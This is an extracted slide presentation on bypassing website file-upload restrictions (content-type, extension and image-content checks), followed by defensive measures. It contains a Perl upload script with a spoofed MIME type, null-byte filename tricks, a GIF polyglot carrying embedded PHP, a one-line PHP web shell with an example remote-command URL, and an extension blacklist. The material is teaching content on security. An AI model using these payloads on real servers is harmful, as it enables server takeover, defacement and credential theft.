BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES AND SECURITY MEASURES By K. Subramanian K. R. Mukesh
Jun 08, 2015
BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES
AND SECURITY MEASURES
By K. Subramanian K. R. Mukesh
File upload
• Necessity• Social networking websites, blogs, File sharing,
etc.• Web developers do not consider the threats• Files should be sanitized • If not, leads to local file inclusion and hacking• Filtering mechanisms
Methods of filtering
Content-Type verification
• HTTP POST – MIME typeContent-Disposition: form-data;
name="uploaded file []";filename="18.jpg"\r\n Content-Type : image/jpeg\r\n\r <file content>
• To bypass this filter, edit the Content-Type to an applicable one.
#!/usr/bin/perl#use LWP;use HTTP::Request::Common;$ua = $ua = LWP::UserAgent->new;;$req = $ua->request(POST'http://example.com/upload.PHP',Content_Type => 'form-data',Content => [userfile => ["sh.PHP", "sh.PHP","Content-Type" =>"application/pdf"],],);print $req->as_string();
An easy way – Tamper data
• Tamper data – Mozilla add-on allows to modify the POST data before submit
Filename extension verification
• Check the extension of the file• Filter out malicious extensions
$blacklist = array(".php", ".phtml", ".php3", ".php4");
• To bypass this, use NULL BYTES in filenamesh.php%00.pdf
(or)sh.asp;xx.pdf
• While uploading, extension is .pdf• When accessed, delivered to PHP interpreter
File content verification
• Applicable to image files• $imageinfo =getimagesize($_FILES['userfile']['tmp_name']);
• To bypass this, manually craft an image file with an embedded PHP code
Content-Type: image/gifGIF89a(...some binary data...)<?PHP
System($_GET[‘command’]);?>(....binary data…)
• PHP interpreter execute the php code inside a garbage of binary values
A Simple Demonstration
Towards Bypassing these Filters
Worst case scenario
• Local file inclusion – PHP shell upload• Simple PHP shell:
<?php System ($_GET [‘command’]);?>
• Executes commands on remote serverwww.example.com/uploads/sh.php?command=‘ifconfig’
• Entire control of the server – rooting it• Defacements, database access, credential
information theft, etc.
Security Measures
• Preventing direct access to the uploaded files$uploaddir = '/var/spool/uploads/';
# Outside of root
• Block web access using .htaccess fileIndexIgnore */*
• Overhead to read and write• Sometimes leads to potential directory
traversal attacks
Random file name implementation
• Prevents attacker knowing the name of the file uploaded
• Map the names in the database$res = $db->query("INSERT INTO uploads SET name=?,original_name=?”)
• Query while reading• A little overhead, but secure• Think again, leads to SQL injection
Conclusion
• Complicated to implement a secure file upload facility
• Many filters = slow response. Leads to Denial Of Service (DOS) attacks
• Best way is to maintain UPLOAD LOGS containing user info like ip address, helpful to trace an attacker
• Secure coding practices
Thank you